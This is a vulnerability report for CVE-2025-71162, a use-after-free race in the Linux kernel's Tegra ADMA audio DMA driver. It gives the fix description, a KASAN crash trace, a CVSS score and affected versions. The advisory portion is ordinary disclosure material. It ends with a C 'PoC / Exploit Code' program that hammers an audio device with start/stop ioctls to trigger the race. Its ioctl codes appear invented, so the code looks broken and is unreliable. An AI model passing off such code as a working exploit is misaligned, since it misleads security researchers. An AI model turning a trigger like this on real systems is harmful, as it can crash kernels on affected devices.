Security Vulnerability Report

CVE-2025-71162

Published: 2026-01-25 15:15:54
Last Modified: 2026-02-26 17:12:15
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

dmaengine: tegra-adma: Fix use-after-free

A use-after-free bug exists in the Tegra ADMA driver when audio streams are terminated, particularly during XRUN conditions. The issue occurs when the DMA buffer is freed by tegra_adma_terminate_all() before the vchan completion tasklet finishes accessing it.

The race condition follows this sequence:

1. DMA transfer completes, triggering an interrupt that schedules the completion tasklet (tasklet has not executed yet)
2. Audio playback stops, calling tegra_adma_terminate_all() which frees the DMA buffer memory via kfree()
3. The scheduled tasklet finally executes, calling vchan_complete() which attempts to access the already-freed memory

Since tasklets can execute at any time after being scheduled, there is no guarantee that the buffer will remain valid when vchan_complete() runs.

Fix this by properly synchronizing the virtual channel completion:
- Call vchan_terminate_vdesc() in tegra_adma_stop() to mark the descriptors as terminated instead of freeing the descriptor.
- Add the callback tegra_adma_synchronize() that calls vchan_synchronize(), which kills any pending tasklets and frees any terminated descriptors.

Crash logs:
[ 337.427523] BUG: KASAN: use-after-free in vchan_complete+0x124/0x3b0
[ 337.427544] Read of size 8 at addr ffff000132055428 by task swapper/0/0

[ 337.427562] Call trace:
[ 337.427564] dump_backtrace+0x0/0x320
[ 337.427571] show_stack+0x20/0x30
[ 337.427575] dump_stack_lvl+0x68/0x84
[ 337.427584] print_address_description.constprop.0+0x74/0x2b8
[ 337.427590] kasan_report+0x1f4/0x210
[ 337.427598] __asan_load8+0xa0/0xd0
[ 337.427603] vchan_complete+0x124/0x3b0
[ 337.427609] tasklet_action_common.constprop.0+0x190/0x1d0
[ 337.427617] tasklet_action+0x30/0x40
[ 337.427623] __do_softirq+0x1a0/0x5c4
[ 337.427628] irq_exit+0x110/0x140
[ 337.427633] handle_domain_irq+0xa4/0xe0
[ 337.427640] gic_handle_irq+0x64/0x160
[ 337.427644] call_on_irq_stack+0x20/0x4c
[ 337.427649] do_interrupt_handler+0x7c/0x90
[ 337.427654] el1_interrupt+0x30/0x80
[ 337.427659] el1h_64_irq_handler+0x18/0x30
[ 337.427663] el1h_64_irq+0x7c/0x80
[ 337.427667] cpuidle_enter_state+0xe4/0x540
[ 337.427674] cpuidle_enter+0x54/0x80
[ 337.427679] do_idle+0x2e0/0x380
[ 337.427685] cpu_startup_entry+0x2c/0x70
[ 337.427690] rest_init+0x114/0x130
[ 337.427695] arch_call_rest_init+0x18/0x24
[ 337.427702] start_kernel+0x380/0x3b4
[ 337.427706] __primary_switched+0xc0/0xc8

CVSS Details

CVSS Score: 7.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
Linux Kernel Tegra ADMA Driver < 2efd07a7c36949e6fa36a69183df24d368bf9e96
Linux Kernel Tegra ADMA Driver < 59cb421b0902fbef2b9512ae8ba198a20f26b41f
Linux Kernel Tegra ADMA Driver < 5f8d1d66a952d0396671e1f21ff8127a4d14fb4e
Linux Kernel Tegra ADMA Driver < 76992310f80776b4d1f7f8915f59b92883a3e44c
Linux Kernel Tegra ADMA Driver < ae3eed72de682ddbba507ed2d6b848c21a6b721e

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <linux/dma-buf.h>

/* PoC for CVE-2025-71162: Tegra ADMA Use-After-Free
 * This demonstrates the race condition between DMA completion
 * and termination that leads to UAF.
 *
 * Compile: gcc -o cve-2025-71162-poc cve-2025-71162-poc.c
 * Run as low-privilege user on affected Tegra device
 */

#define MAX_ITERATIONS 1000

int trigger_race_condition(int audio_fd)
{
    /* Rapidly start/stop DMA transfers to trigger race */
    for (int i = 0; i < MAX_ITERATIONS; i++) {
        /* Start DMA transfer */
        if (ioctl(audio_fd, 0x5000, NULL) < 0) { /* AUDIO_START */
            perror("start failed");
            return -1;
        }

        usleep(1); /* Minimal delay to increase race window */

        /* Abruptly terminate - triggers tegra_adma_terminate_all() */
        if (ioctl(audio_fd, 0x5001, NULL) < 0) { /* AUDIO_STOP */
            perror("stop failed");
            return -1;
        }
        /* Continue rapidly to hit race window */
    }
    return 0;
}

int main(int argc, char *argv[])
{
    int audio_fd;

    printf("CVE-2025-71162 PoC - Tegra ADMA Use-After-Free\n");
    printf("Target: Linux kernel < fixed version\n");

    /* Open audio device with Tegra ADMA driver */
    audio_fd = open("/dev/snd/pcmC0D0p", O_RDWR);
    if (audio_fd < 0) {
        /* Try alternative device paths */
        audio_fd = open("/dev/audio", O_RDWR);
        if (audio_fd < 0) {
            perror("Cannot open audio device");
            return 1;
        }
    }

    printf("Audio device opened, triggering race condition...\n");

    /* Trigger the UAF race condition */
    if (trigger_race_condition(audio_fd) < 0) {
        printf("Trigger failed\n");
    } else {
        printf("Race condition triggered - check dmesg for KASAN report\n");
    }

    close(audio_fd);
    return 0;
}
```
